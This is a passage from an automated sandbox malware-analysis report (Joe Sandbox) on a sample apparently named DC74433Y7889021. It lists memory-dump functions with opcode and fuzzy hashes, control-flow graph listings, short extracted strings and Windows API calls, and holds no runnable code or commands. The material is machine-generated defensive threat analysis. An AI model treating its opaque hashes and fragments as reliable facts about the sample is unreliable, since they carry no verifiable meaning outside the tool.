                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0c4ac039164a4036625e374b70dd721656d5b59552a7081c2e4111991c386ba7
                                                      • Instruction ID: d9ac9327edb1663cc99a78c5903308ee5edc53ae542a329274ec7eeddd9805d2
                                                      • Opcode Fuzzy Hash: 0c4ac039164a4036625e374b70dd721656d5b59552a7081c2e4111991c386ba7
                                                      • Instruction Fuzzy Hash: 31A1F370D002188FDB54DFA9C954BEDBBB1FF88300F209269E509AB3A1DB759A85CF54
                                                      Function 060E310E Relevance: .2, Instructions: 202COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4137359761.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_60e0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 81bbc27f8dabe9171da7fdfa080c82a338f5ba8848580bca88cc4d38adcd7eee
                                                      • Instruction ID: 007ce3d8a9b73f10ff2eca4e5dedc88b2d6bf27d72f247b236dd918fbcac68e0
                                                      • Opcode Fuzzy Hash: 81bbc27f8dabe9171da7fdfa080c82a338f5ba8848580bca88cc4d38adcd7eee
                                                      • Instruction Fuzzy Hash: EE91F370D40218CFEB54DFA8C854BEDBBB1FF49310F2092A9E509AB291DB759A84CF54
                                                      Function 023BE97A Relevance: .1, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 91006f0243ea93607cf5b1518507d3a208eaf22592e6f3392a1025e267ed721e
                                                      • Instruction ID: 0fe3561865892cce34b9bb460c289e8a65fa4a86e3bdf4b2ff10705b5584a557
                                                      • Opcode Fuzzy Hash: 91006f0243ea93607cf5b1518507d3a208eaf22592e6f3392a1025e267ed721e
                                                      • Instruction Fuzzy Hash: 2951B574E00218DFDB19DFAAD894ADDBBF2AF89300F24C029E919AB764DB345841CF00
                                                      Function 023BE988 Relevance: .1, Instructions: 147COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b25dae7a37efed11cfd837cc72f7b2bdb16eb46379530f9026c93c33a4ae8d2f
                                                      • Instruction ID: 9012506d09ada61cb25f89792bafaa82ad6e427de30ae89ccfc893afdb7478ae
                                                      • Opcode Fuzzy Hash: b25dae7a37efed11cfd837cc72f7b2bdb16eb46379530f9026c93c33a4ae8d2f
                                                      • Instruction Fuzzy Hash: E851A474E01318DFDB19DFAAD894A9DBBF2BF89301F248029E919AB364DB345841CF14
                                                      Function 023B76F1 Relevance: 10.5, Strings: 8, Instructions: 457COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 23b76f1-23b7725 1 23b772b-23b774e 0->1 2 23b7b54-23b7b58 0->2 11 23b77fc-23b7800 1->11 12 23b7754-23b7761 1->12 3 23b7b5a-23b7b6e 2->3 4 23b7b71-23b7b7f 2->4 9 23b7b81-23b7b96 4->9 10 23b7bf0-23b7c05 4->10 17 23b7b98-23b7b9b 9->17 18 23b7b9d-23b7baa 9->18 19 23b7c0c-23b7c19 10->19 20 23b7c07-23b7c0a 10->20 15 23b7848-23b7851 11->15 16 23b7802-23b7810 11->16 24 23b7763-23b776e 12->24 25 23b7770 12->25 21 23b7c67 15->21 22 23b7857-23b7861 15->22 16->15 36 23b7812-23b782d 16->36 26 23b7bac-23b7bed 17->26 18->26 27 23b7c1b-23b7c56 19->27 20->27 30 23b7c6c-23b7c85 21->30 22->2 28 23b7867-23b7870 22->28 31 23b7772-23b7774 24->31 25->31 70 23b7c5d-23b7c64 27->70 34 23b787f-23b788b 28->34 35 23b7872-23b7877 28->35 31->11 38 23b777a-23b77dc 31->38 34->30 41 23b7891-23b7897 34->41 35->34 57 23b783b 36->57 58 23b782f-23b7839 36->58 82 23b77de 38->82 83 23b77e2-23b77f9 38->83 43 23b7b3e-23b7b42 41->43 44 23b789d-23b78ad 41->44 43->21 47 23b7b48-23b7b4e 43->47 55 23b78af-23b78bf 44->55 56 23b78c1-23b78c3 44->56 47->2 47->28 59 23b78c6-23b78cc 55->59 56->59 60 23b783d-23b783f 57->60 58->60 59->43 63 23b78d2-23b78e1 59->63 60->15 64 23b7841 60->64 68 23b798f-23b79ba call 23b7538 * 2 63->68 69 23b78e7 63->69 64->15 86 23b79c0-23b79c4 68->86 87 23b7aa4-23b7abe 68->87 72 23b78ea-23b78fb 69->72 72->30 75 23b7901-23b7913 72->75 75->30 77 23b7919-23b7931 75->77 140 23b7933 call 23b80c9 77->140 141 23b7933 call 23b80d8 77->141 81 23b7939-23b7949 81->43 85 23b794f-23b7952 81->85 82->83 83->11 88 23b795c-23b795f 85->88 89 23b7954-23b795a 85->89 86->43 91 23b79ca-23b79ce 86->91 87->2 109 23b7ac4-23b7ac8 87->109 88->21 92 23b7965-23b7968 88->92 89->88 89->92 94 23b79d0-23b79dd 91->94 95 23b79f6-23b79fc 91->95 96 23b796a-23b796e 92->96 97 23b7970-23b7973 92->97 112 23b79df-23b79ea 94->112 113 23b79ec 94->113 99 23b79fe-23b7a02 95->99 100 23b7a37-23b7a3d 95->100 96->97 98 23b7979-23b797d 96->98 97->21 97->98 98->21 101 23b7983-23b7989 98->101 99->100 102 23b7a04-23b7a0d 99->102 103 23b7a49-23b7a4f 100->103 104 23b7a3f-23b7a43 100->104 101->68 101->72 107 23b7a0f-23b7a14 102->107 108 23b7a1c-23b7a32 102->108 110 23b7a5b-23b7a5d 103->110 111 23b7a51-23b7a55 103->111 104->70 104->103 107->108 108->43 117 23b7aca-23b7ad4 call 23b63e0 109->117 118 23b7b04-23b7b08 109->118 114 23b7a5f-23b7a68 110->114 115 23b7a92-23b7a94 110->115 111->43 111->110 116 23b79ee-23b79f0 112->116 113->116 121 23b7a6a-23b7a6f 114->121 122 23b7a77-23b7a8d 114->122 115->43 123 23b7a9a-23b7aa1 115->123 116->43 116->95 117->118 128 23b7ad6-23b7aeb 117->128 118->70 125 23b7b0e-23b7b12 118->125 121->122 122->43 125->70 127 23b7b18-23b7b25 125->127 131 23b7b27-23b7b32 127->131 132 23b7b34 127->132 128->118 137 23b7aed-23b7b02 128->137 134 23b7b36-23b7b38 131->134 132->134 134->43 134->70 137->2 137->118 140->81 141->81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (odq$(odq$(odq$(odq$(odq$(odq$,hq$,hq
                                                      • API String ID: 0-1376594924
                                                      • Opcode ID: 676f3fcaa36894c4f427e7292a432d75a479581759b8efa5397e1f0bcd552edc
                                                      • Instruction ID: bb6aa620a78b927240cb95d8bc4ec9c847a6d9b24ca9e5619e6d507c765db819
                                                      • Opcode Fuzzy Hash: 676f3fcaa36894c4f427e7292a432d75a479581759b8efa5397e1f0bcd552edc
                                                      • Instruction Fuzzy Hash: 5A125A31A002088FCB26CF68D884AEEBBF2FF89315F158559E949DB6A1D730ED41CB50
                                                      Function 023B5F38 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2762 23b5f38-23b5f5a 2763 23b5f5c-23b5f60 2762->2763 2764 23b5f70-23b5f7b 2762->2764 2767 23b5f88-23b5f8f 2763->2767 2768 23b5f62-23b5f6e 2763->2768 2765 23b6023-23b604f 2764->2765 2766 23b5f81-23b5f83 2764->2766 2775 23b6056-23b60ae 2765->2775 2769 23b601b-23b6020 2766->2769 2770 23b5faf-23b5fb8 2767->2770 2771 23b5f91-23b5f98 2767->2771 2768->2764 2768->2767 2867 23b5fba call 23b5f2a 2770->2867 2868 23b5fba call 23b5f38 2770->2868 2771->2770 2772 23b5f9a-23b5fa5 2771->2772 2774 23b5fab-23b5fad 2772->2774 2772->2775 2774->2769 2794 23b60bd-23b60cf 2775->2794 2795 23b60b0-23b60b6 2775->2795 2776 23b5fc0-23b5fc2 2777 23b5fca-23b5fd2 2776->2777 2778 23b5fc4-23b5fc8 2776->2778 2782 23b5fe1-23b5fe3 2777->2782 2783 23b5fd4-23b5fd9 2777->2783 2778->2777 2781 23b5fe5-23b6004 call 23b69a0 2778->2781 2787 23b6019 2781->2787 2788 23b6006-23b600f 2781->2788 2782->2769 2783->2782 2787->2769 2865 23b6011 call 23bafad 2788->2865 2866 23b6011 call 23baef0 2788->2866 2791 23b6017 2791->2769 2797 23b6163-23b6165 2794->2797 2798 23b60d5-23b60d9 2794->2798 2795->2794 2863 23b6167 call 23b62f0 2797->2863 2864 23b6167 call 23b6300 2797->2864 2799 23b60db-23b60e7 2798->2799 2800 23b60e9-23b60f6 2798->2800 2808 23b60f8-23b6102 2799->2808 2800->2808 2801 23b616d-23b6173 2804 23b617f-23b6186 2801->2804 2805 23b6175-23b617b 2801->2805 2806 23b617d 2805->2806 2807 23b61e1-23b6240 2805->2807 2806->2804 2821 23b6247-23b626b 2807->2821 2811 23b612f-23b6133 2808->2811 2812 23b6104-23b6113 2808->2812 2813 23b613f-23b6143 2811->2813 2814 23b6135-23b613b 2811->2814 2823 23b6123-23b612d 2812->2823 2824 23b6115-23b611c 2812->2824 2813->2804 2818 23b6145-23b6149 2813->2818 2816 23b6189-23b61da 2814->2816 2817 23b613d 2814->2817 2816->2807 2817->2804 2820 23b614f-23b6161 2818->2820 2818->2821 2820->2804 2831 23b626d-23b626f 2821->2831 2832 23b6271-23b6273 2821->2832 2823->2811 2824->2823 2833 23b62e9-23b62ec 2831->2833 2834 23b6275-23b6279 2832->2834 2835 23b6284-23b6286 2832->2835 2839 23b627b-23b627d 2834->2839 2840 23b627f-23b6282 2834->2840 2841 23b6299-23b629f 2835->2841 2842 23b6288-23b628c 2835->2842 2839->2833 2840->2833 2843 23b62ca-23b62cc 2841->2843 2844 23b62a1-23b62c8 2841->2844 2845 23b628e-23b6290 2842->2845 2846 23b6292-23b6297 2842->2846 2851 23b62d3-23b62d5 2843->2851 2844->2851 2845->2833 2846->2833 2853 23b62db-23b62dd 2851->2853 2854 23b62d7-23b62d9 2851->2854 2857 23b62df-23b62e4 2853->2857 2858 23b62e6 2853->2858 2854->2833 2857->2833 2858->2833 2863->2801 2864->2801 2865->2791 2866->2791 2867->2776 2868->2776
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hhq$Hhq
                                                      • API String ID: 0-2450388649
                                                      • Opcode ID: 098390bddcc30376582d71b1341322f141903b5f3d07559801079818b2f52604
                                                      • Instruction ID: 1e38fad098bc3437a9bf55a0dbf2cb553206cd40bef119429808721defb4a9d8
                                                      • Opcode Fuzzy Hash: 098390bddcc30376582d71b1341322f141903b5f3d07559801079818b2f52604
                                                      • Instruction Fuzzy Hash: 1CB1C370B042158FDB169F34C8557BE7BAAEF89314F148569E606CB792DB34CC42CB91
                                                      Function 023B6498 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,hq$,hq
                                                      • API String ID: 0-3475114797
                                                      • Opcode ID: deb2d033ea3ee2d0c8cf4df132e7360dfeeedabfb2432958556ab0c7f3de2974
                                                      • Instruction ID: 17767beb7bfd2392338fab5e6346e0f465a35194cd923b54fccee0df2d6ca9c0
                                                      • Opcode Fuzzy Hash: deb2d033ea3ee2d0c8cf4df132e7360dfeeedabfb2432958556ab0c7f3de2974
                                                      • Instruction Fuzzy Hash: 8281AF74B005058FCB15CF78C485AEABBBABF89304B158169D606DBBA6DB31EC41CF50
                                                      Function 023B3CB1 Relevance: 2.6, Strings: 2, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xhq$Xhq
                                                      • API String ID: 0-635196136
                                                      • Opcode ID: 77d80221c4bd0dfaa79b46b843cce4712674a4ae94d77d345178fe8c08557b2e
                                                      • Instruction ID: 40212b2b8d45c77422b744e5325845575a6842b88681ca76bebb6feaf3cf20b2
                                                      • Opcode Fuzzy Hash: 77d80221c4bd0dfaa79b46b843cce4712674a4ae94d77d345178fe8c08557b2e
                                                      • Instruction Fuzzy Hash: 1E310771B442384BDF1A4EB988A43FEA6AAAFC4201F18447FEA06C7B81DB74C8458751
                                                      Function 023B8EF8 Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $dq$$dq
                                                      • API String ID: 0-2340669324
                                                      • Opcode ID: 99b3c67f191ade88272930250bf0111cb6807a458cebaa127b9da9d91f079f98
                                                      • Instruction ID: 7df15e1b9a9a4ad028bc6d14e5aa64bb094c150b96e9050f56b90b9a7aa18bf1
                                                      • Opcode Fuzzy Hash: 99b3c67f191ade88272930250bf0111cb6807a458cebaa127b9da9d91f079f98
                                                      • Instruction Fuzzy Hash: 7331A5703443518FCB2B8E68E8986BE776FEF85711B15046AE106CBA93DB28CC41C751
                                                      Function 023B9D59 Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'dq$4'dq
                                                      • API String ID: 0-2306408947
                                                      • Opcode ID: 368b98441499b83fc163ae4191cd552253600a44e0d485e2994352b9dcb1ea7f
                                                      • Instruction ID: 9c656f306e5ebaec97f31a3f19e40cbe3f24b6965e820d5832deb536838b999b
                                                      • Opcode Fuzzy Hash: 368b98441499b83fc163ae4191cd552253600a44e0d485e2994352b9dcb1ea7f
                                                      • Instruction Fuzzy Hash: FBF044357002146FDB195EA69850ABBBADBEFC9360F148429BB09C7791DE75CC1187A0
                                                      Function 023B0C8F Relevance: 1.8, Strings: 1, Instructions: 543COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LRdq
                                                      • API String ID: 0-3106745678
                                                      • Opcode ID: 89d571c3816cba186eb2c65cc5f238f89ff0cb31248029610e43c7c64ae7798c
                                                      • Instruction ID: 3ba9ac872f01ccefb8e143d8955724076814ff8801c42e98eaf22de3a2c94efe
                                                      • Opcode Fuzzy Hash: 89d571c3816cba186eb2c65cc5f238f89ff0cb31248029610e43c7c64ae7798c
                                                      • Instruction Fuzzy Hash: CB52AA78D41229CFCB54EF64E994A9DBBF2FB48301F1049A9D409AB358DB706E85CF81
                                                      Function 023B0CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LRdq
                                                      • API String ID: 0-3106745678
                                                      • Opcode ID: b62098669159b745527f7fb560bd81af134d2edf70ac08f053be5e2f8f4ec81a
                                                      • Instruction ID: 53fc7549d0d55de5691e4b622899f3ca840ac3d07934f1a026029b59781c468d
                                                      • Opcode Fuzzy Hash: b62098669159b745527f7fb560bd81af134d2edf70ac08f053be5e2f8f4ec81a
                                                      • Instruction Fuzzy Hash: B052AA78D41229CFCB54EF64E994A9DBBF2FB48301F1049A9D409AB358DB706E85CF81
                                                      Function 060E992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LdrInitializeThunk.NTDLL(00000000), ref: 060E9A6E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4137359761.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_60e0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 17824e2bda397de6ceae8464ebe96df04c2a319dfb730cd6ec18fd4cd427e958
                                                      • Instruction ID: 42e5cfc1f168ade261592f6319a66863b1ff079602673dbd489f86cfd5363f1b
                                                      • Opcode Fuzzy Hash: 17824e2bda397de6ceae8464ebe96df04c2a319dfb730cd6ec18fd4cd427e958
                                                      • Instruction Fuzzy Hash: 7A116A74E811199FDB48CFA8D884AADBBF5FF88314F148165E804A7345D730AD81CB90
                                                      Function 08F82828 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnumThreadWindows.USER32(?,00000000,?), ref: 08F828A1
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4139952329.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_8f80000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: EnumThreadWindows
                                                      • String ID:
                                                      • API String ID: 2941952884-0
                                                      • Opcode ID: c15c402e2209e72136b36465df786ee0dec870b81a7b7c7b40156e48188baa82
                                                      • Instruction ID: ae60c46b56530c39c62e9c2ae52c26db62984e90a54d3bf1111899de8b80bb14
                                                      • Opcode Fuzzy Hash: c15c402e2209e72136b36465df786ee0dec870b81a7b7c7b40156e48188baa82
                                                      • Instruction Fuzzy Hash: 6A2135B1D002498FDB10DFAAC844BEEFBF5AB88320F14842ED459A7250C778A944CF65
                                                      Function 0908E1F9 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0908E225
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4140016319.0000000009080000.00000040.00000800.00020000.00000000.sdmp, Offset: 09080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_9080000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2492992576-0
                                                      • Opcode ID: b566de4fade1afbbfe1860586bc0d198b6f750acfadc46786748e8b5f7f2273e
                                                      • Instruction ID: adf1087e174473fb27b366452fe92ba568654af8b08d79f38f70385a2515fc3d
                                                      • Opcode Fuzzy Hash: b566de4fade1afbbfe1860586bc0d198b6f750acfadc46786748e8b5f7f2273e
                                                      • Instruction Fuzzy Hash: 47117C303106208FCB99BF79C85482A7BEAAF8961131544AAE552CF3B1EF71DC02C7A1
                                                      Function 08F82830 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnumThreadWindows.USER32(?,00000000,?), ref: 08F828A1
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4139952329.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_8f80000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: EnumThreadWindows
                                                      • String ID:
                                                      • API String ID: 2941952884-0
                                                      • Opcode ID: 9425dd24f7c76e3533831d49db40c6beb0d6e9c4e017dbbf972de250a926cd4b
                                                      • Instruction ID: 70d8447de316a61343186af0ff55f89197b1095a08f73cd3e06f9dfbf8a51e89
                                                      • Opcode Fuzzy Hash: 9425dd24f7c76e3533831d49db40c6beb0d6e9c4e017dbbf972de250a926cd4b
                                                      • Instruction Fuzzy Hash: 772108B1D00209DFDB14DFAAC845BEEFBF5EB88320F14842AD459A3250D774A944CF65
                                                      Function 0908E208 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0908E225
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4140016319.0000000009080000.00000040.00000800.00020000.00000000.sdmp, Offset: 09080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_9080000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2492992576-0
                                                      • Opcode ID: 6ddc8130d92822f3f36b0ca6fd0bef196eb30d5adcc3957710927c216d0d09b4
                                                      • Instruction ID: 99bf937f19060943e569206a9e91d1723d175be8fbbd38d921499ad7343623b2
                                                      • Opcode Fuzzy Hash: 6ddc8130d92822f3f36b0ca6fd0bef196eb30d5adcc3957710927c216d0d09b4
                                                      • Instruction Fuzzy Hash: EC111B343115208FCB99BF79C81482A77EAAFC9A5131548A9E512CB3B1EE71DC02C7A0
                                                      Function 08F89140 Relevance: 1.6, APIs: 1, Instructions: 54windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,?,?,?), ref: 08F891A5
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4139952329.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_8f80000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: c3e6b664fe9e6d3c7d790964fc280a67c2643fc5d3a0e6bd640dc5bc5daa79c5
                                                      • Instruction ID: b2a276762d021cdeca6a3718212510e62abcf976656a4e57c4dcf500eee8804c
                                                      • Opcode Fuzzy Hash: c3e6b664fe9e6d3c7d790964fc280a67c2643fc5d3a0e6bd640dc5bc5daa79c5
                                                      • Instruction Fuzzy Hash: 111156B5804349CFDB01CFA9C949BEEBFF4AB49320F14849AD454A7251C378A944CFA1
                                                      Function 08F83358 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,?,?,?,?,?,?,?,08F84189,?,?,00000000), ref: 08F841FD
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4139952329.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_8f80000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 58d17c3487ffc9a55ff549f14e04f074d3984fb7b8b66ddbcfd6874f218669ef
                                                      • Instruction ID: fadd7ba095a809a4de5d599e8efa3284a32bd59909ea1437396b69150d64e5c8
                                                      • Opcode Fuzzy Hash: 58d17c3487ffc9a55ff549f14e04f074d3984fb7b8b66ddbcfd6874f218669ef
                                                      • Instruction Fuzzy Hash: 611153B58003499FDB10DFA9C888BDEBFF8EB58310F10844AE448A7200C375A944CFA4
                                                      Function 08F89148 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,?,?,?), ref: 08F891A5
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4139952329.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_8f80000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: 0fa9a5e46f730bb1ca7bb0609082b0945f31e3b880d7092a59d9a9e89fc8b488
                                                      • Instruction ID: 7b5fe32fd6d45bb8735026a9d58aa9b434460b76462dafaeb5178ca3dec8bf28
                                                      • Opcode Fuzzy Hash: 0fa9a5e46f730bb1ca7bb0609082b0945f31e3b880d7092a59d9a9e89fc8b488
                                                      • Instruction Fuzzy Hash: EA1128B5800349DFDB10DF9AC849BEEBFF8EB48320F108419D514A3640C375A544CFA5
                                                      Function 08F83364 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,?,?,?,?,?,?,?,08F84189,?,?,00000000), ref: 08F841FD
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4139952329.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_8f80000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 0ca9dae47f32a1eb43af5b194e4d494d443a46f070a590a85bcb7accc938596e
                                                      • Instruction ID: a6ae058ba11434f0fbed561444ef0da6a6185d739cff45cac4a72c4380422b0e
                                                      • Opcode Fuzzy Hash: 0ca9dae47f32a1eb43af5b194e4d494d443a46f070a590a85bcb7accc938596e
                                                      • Instruction Fuzzy Hash: 7B11E0B5800349DFDB20DF9AD849BDEBBF8EB58320F10845AE919A7240C375A954CFA5
                                                      Function 08F84198 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,?,?,?,?,?,?,?,08F84189,?,?,00000000), ref: 08F841FD
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4139952329.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_8f80000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 9564b137ef3f6fb12f1fbf7d0df50b2e605a11d111c587ef6198f1c2379fa83d
                                                      • Instruction ID: 56fc872b21f7f53d53eb66deedbd23023662da12afc747e4bac2737593d8a83b
                                                      • Opcode Fuzzy Hash: 9564b137ef3f6fb12f1fbf7d0df50b2e605a11d111c587ef6198f1c2379fa83d
                                                      • Instruction Fuzzy Hash: 6D11E0B98003499EDB10DF99D989BDEBBF4EB58320F10844AE519A7250C375AA54CFA4
                                                      Function 0908E350 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL ref: 0908E388
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4140016319.0000000009080000.00000040.00000800.00020000.00000000.sdmp, Offset: 09080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_9080000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2492992576-0
                                                      • Opcode ID: c5c8080a4eb4ce75a1310246d6f42485a9bc6847392313c79741258ead205a54
